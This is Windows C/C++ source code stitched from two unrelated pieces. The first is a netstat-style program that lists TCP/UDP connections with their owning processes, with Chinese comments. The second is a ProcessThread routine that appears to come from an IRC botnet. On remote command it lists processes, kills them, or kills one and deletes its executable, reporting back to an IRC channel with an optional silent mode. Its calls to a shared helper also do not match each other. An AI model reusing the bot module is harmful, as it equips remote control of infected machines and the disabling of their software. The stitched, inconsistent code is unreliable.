int main()
{
// 定义扩展函数指针
PFNAllocateAndGetTcpExTableFromStack pAllocateAndGetTcpExTableFromStack;
PFNAllocateAndGetUdpExTableFromStack pAllocateAndGetUdpExTableFromStack;
// 获取扩展函数的入口地址
HMODULE hModule = ::LoadLibrary("iphlpapi.dll");
pAllocateAndGetTcpExTableFromStack =
(PFNAllocateAndGetTcpExTableFromStack)::GetProcAddress(hModule,
"AllocateAndGetTcpExTableFromStack");
pAllocateAndGetUdpExTableFromStack =
(PFNAllocateAndGetUdpExTableFromStack)::GetProcAddress(hModule,
"AllocateAndGetUdpExTableFromStack");
if(pAllocateAndGetTcpExTableFromStack == NULL || pAllocateAndGetUdpExTableFromStack == NULL)
{
printf(" Ex APIs are not present \n ");
// 说明你应该调用普通的IP帮助API去获取TCP连接表和UDP监听表
return 0;
}
// 调用扩展函数,获取TCP扩展连接表和UDP扩展监听表
PMIB_TCPEXTABLE pTcpExTable;
PMIB_UDPEXTABLE pUdpExTable;
// pTcpExTable和pUdpExTable所指的缓冲区自动由扩展函数在进程堆中申请
if(pAllocateAndGetTcpExTableFromStack(&pTcpExTable, TRUE, GetProcessHeap(), 2, 2) != 0)
{
printf(" Failed to snapshot TCP endpoints.\n");
return -1;
}
if(pAllocateAndGetUdpExTableFromStack(&pUdpExTable, TRUE, GetProcessHeap(), 2, 2) != 0)
{
printf(" Failed to snapshot UDP endpoints.\n");
return -1;
}
// 给系统内的所有进程拍一个快照
HANDLE hProcessSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)
{
printf(" Failed to take process snapshot. Process names will not be shown.\n\n");
return -1;
}
printf(" Active Connections \n\n");
char szLocalAddr[128];
char szRemoteAddr[128];
char szProcessName[128];
in_addr inadLocal, inadRemote;
char strState[128];
DWORD dwRemotePort = 0;
// 打印TCP扩展连接表信息
for(UINT i = 0; i < pTcpExTable->dwNumEntries; ++i)
{
// 状态
switch (pTcpExTable->table[i].dwState)
{
case MIB_TCP_STATE_CLOSED:
strcpy(strState, "CLOSED");
break;
case MIB_TCP_STATE_TIME_WAIT:
strcpy(strState, "TIME_WAIT");
break;
case MIB_TCP_STATE_LAST_ACK:
strcpy(strState, "LAST_ACK");
break;
case MIB_TCP_STATE_CLOSING:
strcpy(strState, "CLOSING");
break;
case MIB_TCP_STATE_CLOSE_WAIT:
strcpy(strState, "CLOSE_WAIT");
break;
case MIB_TCP_STATE_FIN_WAIT1:
strcpy(strState, "FIN_WAIT1");
break;
case MIB_TCP_STATE_ESTAB:
strcpy(strState, "ESTAB");
break;
case MIB_TCP_STATE_SYN_RCVD:
strcpy(strState, "SYN_RCVD");
break;
case MIB_TCP_STATE_SYN_SENT:
strcpy(strState, "SYN_SENT");
break;
case MIB_TCP_STATE_LISTEN:
strcpy(strState, "LISTEN");
break;
case MIB_TCP_STATE_DELETE_TCB:
strcpy(strState, "DELETE");
break;
default:
printf("Error: unknown state!\n");
break;
}
// 本地IP地址
inadLocal.s_addr = pTcpExTable->table[i].dwLocalAddr;
// 远程端口
if(strcmp(strState, "LISTEN") != 0)
{
dwRemotePort = pTcpExTable->table[i].dwRemotePort;
}
else
dwRemotePort = 0;
// 远程IP地址
inadRemote.s_addr = pTcpExTable->table[i].dwRemoteAddr;
sprintf(szLocalAddr, "%s:%u", inet_ntoa(inadLocal),
ntohs((unsigned short)(0x0000FFFF & pTcpExTable->table[i].dwLocalPort)));
sprintf(szRemoteAddr, "%s:%u", inet_ntoa(inadRemote),
ntohs((unsigned short)(0x0000FFFF & dwRemotePort)));
// 打印出此入口的信息
printf("%-5s %s:%d\n State: %s\n", "[TCP]",
ProcessPidToName(hProcessSnap, pTcpExTable->table[i].dwProcessId, szProcessName),
pTcpExTable->table[i].dwProcessId,
strState);
printf(" Local: %s\n Remote: %s\n",
szLocalAddr, szRemoteAddr);
}
// 打印UDP监听表信息
for(i = 0; i < pUdpExTable->dwNumEntries; ++i)
{
// 本地IP地址
inadLocal.s_addr = pUdpExTable->table[i].dwLocalAddr;
sprintf(szLocalAddr, "%s:%u", inet_ntoa(inadLocal),
ntohs((unsigned short)(0x0000FFFF & pUdpExTable->table[i].dwLocalPort)));
// 打印出此入口的信息
printf("%-5s %s:%d\n", "[UDP]",
ProcessPidToName(hProcessSnap, pUdpExTable->table[i].dwProcessId, szProcessName),
pUdpExTable->table[i].dwProcessId );
printf(" Local: %s\n Remote: %s\n",
szLocalAddr, "*.*.*.*:*" );
}
::CloseHandle(hProcessSnap);
::LocalFree(pTcpExTable);
::LocalFree(pUdpExTable);
::FreeLibrary(hModule);
return 0;
}
// bdata1 = list
// bdata2 = kill
// bdata3 = del on kill
DWORD WINAPI ProcessThread(LPVOID param)
{
NTHREAD process = *((NTHREAD *)param);
NTHREAD *processt = (NTHREAD *)param;
processt->gotinfo = TRUE;
IRC* irc=(IRC*)process.conn;
char sendbuf[IRCLINE];
//char target[128];
//sprintf(target,process.hostd->target);
//char *target=process.hostd->target;
if (process.bdata1) // list
{
std::list<process_info> lProcesses;
if(ListProcesses(&lProcesses,process.data2))
{
std::list<process_info>::iterator ip; int iCount=0;
irc->privmsg(process.target,"%s Process List:",process_title);
if (process.verbose)
irc->privmsg(process.target," PID � - Mem Usage - Process");
for(ip=lProcesses.begin(); ip!=lProcesses.end(); ++ip)
{
iCount++;
char *processExe=(*ip).sProcessName;
char *mUsage=(*ip).mUsage;
unsigned long processPid=(*ip).lProcessPid;
strcat(mUsage," K");
sprintf(sendbuf," %-6d- %-10s- \"%s\"",processPid,mUsage,processExe);
irc->privmsg(process.target,sendbuf);
}
//sprintf(sendbuf,"%s Displayed process list.",process_title);
//addlog(MAINLOG,sendbuf);
irc->privmsg(process.target,"%s End of list.",process_title);
}
else
{
irc->privmsg(process.target,"%s Unable to list processes, error: <%d>.",process_title,GetLastError());
//addlog(ERRORLOG,sendbuf);
}
}
else
{
if (process.bdata2) // kill
{
char procKilled[16];
if (!process.bdata3) // delete
{
if (KillProcess(process.data1,procKilled))
{
if (!process.silent)
irc->privmsg(process.target,"%s Process \"%s\" killed, total: <%s>.",process_title,process.data1,procKilled);
}
else if (KillPid(atoi(process.data1)))
{
if (!process.silent)
irc->privmsg(process.target,"%s PID \"%i\" killed.",process_title,atoi(process.data1));
}
else
{
if (!process.silent)
irc->privmsg(process.target,"%s Failed to kill process.",process_title);
}
}
else
{
char path[MAX_PATH];
sprintf(path,"%s",ProcessPidToName(atoi(process.data1),path));
char fname[_MAX_FNAME],ext[_MAX_EXT];
_splitpath(path,0,0,fname,ext);
strcat(fname,ext);
BOOL success=FALSE;
BOOL killed=FALSE;
for (int t=0;t<5;t++)
{
if (KillPid(atoi(process.data1)))
killed=TRUE;
SetFileAttributes(path,FILE_ATTRIBUTE_NORMAL);
if (DeleteFile(path))
{
success=TRUE;
break;
}
else
{
if (killed) //if we've killed the process id and cant erase
KillProcess(fname,0);//it maybe its running more than once
Sleep(1000);
}
}
if (success)
{
if (!process.silent)
irc->privmsg(process.target,"%s PID \"%i\" killed and deleted.",process_title,atoi(process.data1));
}
else
{
if (!process.silent)
irc->privmsg(process.target,"%s Failed to kill and erase process.",process_title);
}
}
}
}
clearthread(process.threadnum);
return 0;
}
